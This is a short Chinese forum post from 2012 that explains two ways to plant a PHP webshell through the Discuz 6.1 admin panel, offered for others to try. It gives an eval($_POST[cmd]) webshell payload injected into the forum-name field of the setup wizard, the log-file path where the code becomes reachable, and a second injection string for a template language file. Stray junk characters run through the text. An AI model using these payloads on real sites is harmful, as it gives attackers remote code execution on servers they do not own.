discuz6.1两种方法后台拿shell
' `( R2 n& L' A+ @* m0 W好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下! f3 T# s$ I$ f& G! t0 t3 z: ]
1:4 T( f4 b5 n& O3 \+ L' |, K
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
: D( U, h: x; P; M8 uadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
- S/ X w0 b2 g: `8 C+ j# K<?php eval($_POST[cmd]);?>
. b- b4 _/ s3 ?& ^7 v X后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
7 X5 `7 U2 ?; L! \' ~
8 D9 r0 Q4 r; N; v* R8 i3 K9 O! r5 u% i
2:后台模板管理--默认模板套系--详情$ c- p+ F0 d* t" z1 o/ V
templates/default/actions.lang.php x, g+ D: U1 E X5 W
jhackj\\');eval($_POST[cmd])?>;//
/ c( D2 @& k, d( L7 Z- x0 u. g
0 g% N* p5 q0 ?1 c7 A! B利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对